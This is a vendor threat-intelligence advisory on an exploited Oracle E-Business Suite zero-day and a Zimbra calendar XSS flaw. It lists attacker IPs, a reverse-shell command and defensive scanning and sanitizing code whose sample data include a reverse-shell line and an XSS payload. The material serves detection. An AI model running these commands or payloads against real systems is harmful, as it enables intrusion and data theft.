SOCRadar® Cyber Intelligence Inc. | CVE-2025-61882: Oracle E-Business Suite Exploited – What You Need to Know
Oct 06, 2025
Apr 21, 2026

CVE-2025-61882: Oracle E-Business Suite Exploited – What You Need to Know

Recently, Oracle confirmed a critical zero-day vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The flaw, already exploited in the wild, has been used in data theft and extortion attacks attributed to the Cl0p ransomware gang. As Oracle rushed out an emergency fix, the situation revealed a wider ecosystem of threat actors and exploit leaks that organizations must urgently address.

What is CVE-2025-61882?

CVE-2025-61882 (CVSS 9.8) is a Remote Code Execution (RCE) vulnerability in the BI Publisher Integration component of Oracle’s Concurrent Processing module – an integral service within Oracle E-Business Suite that handles automated and background processes.

This flaw is remotely exploitable over HTTP without authentication, allowing an attacker to execute arbitrary code without valid credentials.

CVE-2025-61882 (SOCRadar Vulnerability Intelligence)


Which Oracle E-Business Suite (EBS) Versions are Affected By this Vulnerability?

CVE-2025-61882 affects Oracle EBS versions 12.2.3 through 12.2.14.

Why is this Considered a Zero-Day Vulnerability?

CVE-2025-61882 was actively exploited before the patch release, making it a zero-day. Oracle released an emergency advisory on October 4, 2025, detailing patch information and providing a set of Indicators of Compromise (IOCs) for immediate detection.

Who is Behind the Exploitation?

Investigations by Mandiant and the Google Threat Intelligence Group (GTIG) trace the exploitation to the Cl0p ransomware gang, known for mass data theft and extortion.

According to reports, the group has been sending ransom demands via compromised email accounts, claiming to have stolen sensitive data from Oracle EBS systems. The extortion campaign intensified between late September and early October 2025.

Cl0p’s extortion email (Source: Google Mandiant)


Interestingly, the exploit’s public leak didn’t come from Cl0p itself but from another threat actor collective calling itself “Scattered Lapsus$ Hunters.” On October 3, 2025, this group leaked two files on Telegram – one allegedly containing Oracle-related source code and another archive.

How Severe is the Risk for Oracle EBS Customers?

The danger is high and immediate. The official Oracle advisory warns that CVE-2025-61882 can be exploited without authentication, enabling attackers to compromise exposed systems remotely with minimal effort.

The release of a public Proof-of-Concept (PoC) exploit has further increased the risk of widespread exploitation beyond Cl0p’s campaign. Security researchers warn that other threat actors could adopt the leaked exploit in opportunistic attacks.

SOCRadar’s Vulnerability Intelligence


With SOCRadar’s Vulnerability Intelligence, part of its Cyber Threat Intelligence (CTI) module, you can stay ahead of emerging threats by continuously tracking and prioritizing new CVEs that matter to your environment. Use it to identify which vulnerabilities are being weaponized, understand their exploit context, and take action before attackers do.

SOCRadar Dark Web Monitoring module


You can also leverage SOCRadar’s Dark Web Monitoring to keep an eye on hidden forums, Telegram channels, and leak sites for exploit dumps, PoC releases, and extortion chatter. This way, your team can catch early signs of exploit activity and respond before risks escalate.

What Indicators of Compromise (IOCs) Should Defenders Look For?

Oracle’s advisory lists several confirmed IOCs that defenders can use to detect and contain ongoing attacks:

IP addresses linked to exploitation:

  • 200[.]107[.]207[.]26
  • 185[.]181[.]60[.]11

Command observed:

  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 (used to establish a reverse shell)

Exploit archive and related files:

  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Organizations should examine system logs, proxy traffic, and endpoint telemetry for these indicators and monitor for outbound connections to the listed IPs.
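The IOC review described above can be scripted rather than done by eye. The following is an added example, not SOCRadar’s or Oracle’s code: it takes the two advisory IP addresses and the leaked archive file names exactly as listed above, matches the reverse-shell command by its shape (the advisory’s copy has the target host and port stripped, so a literal match would miss real activity), and runs them over a handful of constructed proxy, audit and EDR log lines. The log lines, the host names in them and the 203.0.113.9 destination are all sample values made up for this example.

```python
"""Triage constructed log lines against the IOCs Oracle published for CVE-2025-61882.

Added example, not SOCRadar's or Oracle's code. The two IP addresses and the
file names come from the advisory as quoted in the article; the reverse-shell
pattern matches the shape of the observed command, because the advisory's copy
has the target host and port stripped. Every log line below is constructed
sample data, not real telemetry.
"""
import re
from dataclasses import dataclass

# IOCs as listed (defanged) in the advisory.
DEFANGED_IPS = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
EXPLOIT_FILE_NAMES = ("oracle_ebs_nday_exploit_poc", "exp.py", "server.py")


def refang(ioc: str) -> str:
    """Turn a defanged address such as '200[.]107[.]207[.]26' into a dotted quad."""
    return ioc.replace("[.]", ".")


# Anchor each IP so that a longer address (e.g. 185.181.60.110) is not a false match.
IP_PATTERNS = {
    refang(ip): re.compile(r"(?<![\d.])" + re.escape(refang(ip)) + r"(?![\d.])")
    for ip in DEFANGED_IPS
}

# 'bash -i >& /dev/tcp/<host>/<port> 0>&1' is the classic reverse-shell idiom;
# match the prefix only, so any destination host/port is caught.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/")


@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str        # "ip", "reverse_shell" or "exploit_file"
    indicator: str   # the matched IOC


def scan_lines(lines):
    """Return every IOC hit found in an iterable of log lines (1-based line numbers)."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for ip, pattern in IP_PATTERNS.items():
            if pattern.search(line):
                hits.append(Hit(n, "ip", ip))
        if REVERSE_SHELL_RE.search(line):
            hits.append(Hit(n, "reverse_shell", "bash -i >& /dev/tcp/"))
        for name in EXPLOIT_FILE_NAMES:
            if name in line:
                hits.append(Hit(n, "exploit_file", name))
    return hits


def summarize(hits):
    """Count hits per kind, the figure an analyst would put in a first triage note."""
    counts = {}
    for h in hits:
        counts[h.kind] = counts.get(h.kind, 0) + 1
    return counts


# Constructed sample lines (proxy, auditd-style and EDR records). 203.0.113.9 is a
# documentation address standing in for the stripped reverse-shell destination.
SAMPLE_LOGS = [
    "2025-09-28T02:11:09Z proxy CONNECT 200.107.207.26:443 client=ebs-app01",
    '2025-09-28T02:11:10Z auditd exe=/bin/sh cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"',
    "2025-09-28T02:12:00Z web GET /OA_HTML/AppsLogin client=10.0.0.5 status=200",
    "2025-09-30T08:00:00Z edr file_create path=/tmp/oracle_ebs_nday_exploit_poc_x/exp.py",
    "2025-09-30T08:00:01Z proxy CONNECT 185.181.60.110:443 client=ebs-app02",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.kind} -> {hit.indicator}")
    print(summarize(scan_lines(SAMPLE_LOGS)))
```

Two details matter in practice: the IP patterns are anchored so the near-miss 185.181.60.110 on the last sample line is not reported, and the reverse-shell check looks for the bash-to-/dev/tcp idiom rather than a specific destination, which is the only way the elided command in the advisory can be hunted for at all.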

How Has Oracle Responded?

Oracle’s Chief Security Officer Rob Duhart announced the release of the Security Alert Advisory for CVE-2025-61882 and reaffirmed the urgency of patching. In a related Oracle Security blog post, he clarified that while vulnerabilities addressed in the July 2025 CPU were initially suspected, this new zero-day required an emergency fix.

Oracle also reiterated that the October 2023 CPU is a required prerequisite before installing the new patch. Furthermore, only EBS versions covered under Premier or Extended Support are eligible to receive the update. Older, unsupported versions may also be vulnerable but will not receive patches.

What Should Organizations Do Now?

Oracle strongly recommends that customers patch immediately and verify they are not already compromised. Key defensive steps include:

  • Install updates – Ensure the October 2023 CPU is installed before applying the emergency CVE-2025-61882 patch.
  • Check support coverage – Confirm your Oracle EBS deployment is under Premier or Extended Support; plan upgrades if not.
  • Investigate for compromise – Review logs, run endpoint scans, and check for the IOCs Oracle published.
  • Restrict exposure – Limit internet access to Oracle EBS servers and segregate them from core networks.
  • Hunt retroactively – Examine activity dating back to August 2025, as exploitation predated the fix.
  • Be alert for extortion emails – Treat unsolicited data-theft threats with suspicion and coordinate with internal legal and incident response teams.
  • Monitor for PoC use – With a public exploit now circulating, continuous monitoring is critical to detect new attempts.

For the full patch documentation, IOC references, and official instructions, consult Oracle’s Security Alert Advisory and the Patch Availability Document.

Another Zero-Day in the Spotlight: CVE-2025-27915 in Zimbra Collaboration Suite

Researchers also identified another zero-day earlier this year targeting Zimbra Collaboration Suite (ZCS). The flaw, CVE-2025-27915, is a cross-site scripting (XSS) vulnerability in ZCS 9.0, 10.0, and 10.1, arising from unsanitized HTML in .ICS calendar files.

How Was CVE-2025-27915 Exploited?

The campaign used phishing emails impersonating the Libyan Navy’s Office of Protocol to target a Brazilian military organization. Attackers embedded malicious JavaScript in calendar invitations, stealing credentials, emails, and contacts when users opened them.
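The weakness behind CVE-2025-27915 is a calendar client rendering text taken from an .ICS file as HTML. As an added example (not Zimbra’s code and not its fix), the following shows the defensive handling a mail gateway or client should apply: unfold and parse the invitation’s text properties, flag any that carry active HTML content, and HTML-escape everything before it reaches a template. The two .ICS bodies are constructed; the first embeds an inline event handler across a folded DESCRIPTION line, the second is an ordinary invite.

```python
"""Triage and neutralize HTML in the text fields of an iCalendar (.ics) invitation.

Added example, not Zimbra's code or its fix for CVE-2025-27915. It assumes a
mail or calendar front end that would otherwise drop DESCRIPTION, SUMMARY or
LOCATION straight into an HTML view; the two .ics bodies below are constructed.
"""
import html
import re

TEXT_PROPS = ("SUMMARY", "DESCRIPTION", "LOCATION")

# Markup that can execute: a script element, an event-handler attribute inside a
# tag, or a javascript: URL. Used for gateway-side triage, not as the only defence.
ACTIVE_CONTENT_RE = re.compile(
    r"<\s*script\b|<[^>]*\son[a-z]+\s*=|javascript:", re.IGNORECASE
)


def unfold(ics_text: str) -> str:
    """Undo RFC 5545 line folding: a line break followed by a space or tab continues the line."""
    return re.sub(r"\r?\n[ \t]", "", ics_text)


def unescape_ics(value: str) -> str:
    """Undo RFC 5545 text escaping (backslash before n, comma, semicolon or backslash)."""
    return re.sub(r"\\([\\;,nN])",
                  lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def parse_text_props(ics_text: str) -> dict:
    """Collect the human-readable text properties, ignoring parameters such as ;LANGUAGE=en."""
    found = {prop: [] for prop in TEXT_PROPS}
    for line in unfold(ics_text).splitlines():
        name, sep, value = line.partition(":")
        if not sep:
            continue
        prop = name.split(";", 1)[0].upper()
        if prop in found:
            found[prop].append(unescape_ics(value))
    return found


def is_suspicious(ics_text: str) -> bool:
    """True if any text property carries active HTML content."""
    props = parse_text_props(ics_text)
    return any(ACTIVE_CONTENT_RE.search(v) for values in props.values() for v in values)


def render_safely(ics_text: str) -> list:
    """Escape every text property so a template can only ever show it as text."""
    props = parse_text_props(ics_text)
    return [(prop, html.escape(v, quote=True)) for prop, values in props.items() for v in values]


# Constructed invitations. The first carries an inline event handler in a folded
# DESCRIPTION line; the second is an ordinary invite.
MALICIOUS_ICS = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
    "SUMMARY;LANGUAGE=en:Protocol meeting\r\n"
    "DESCRIPTION:Agenda attached <img src=x onerror=alert(1)> plea\r\n se confirm\r\n"
    "LOCATION:Room 4\\, Bldg A\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)
BENIGN_ICS = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
    "SUMMARY:Protocol meeting\r\n"
    "DESCRIPTION:Agenda attached\\, please confirm\r\n"
    "LOCATION:Room 4\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    print("suspicious:", is_suspicious(MALICIOUS_ICS), is_suspicious(BENIGN_ICS))
    for prop, value in render_safely(MALICIOUS_ICS):
        print(prop, "=", value)
```

The unfolding step is what makes the check meaningful: a payload split across a folded line would slip past a scanner that only looks at raw lines. Escaping on output, rather than trying to strip tags, is the fix that actually closes this class of bug; the triage regex only adds an early alert.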

StrikeReady traced the attacks back to January 2025, predating Zimbra’s fix on January 27 (ZCS 9.0.0 P44, 10.0.13, and 10.1.5). Attribution remains unclear, but researchers noted overlaps with UNC1151, a group tied to the Belarusian government.

For further information, see the research blog and Zimbra’s official advisory.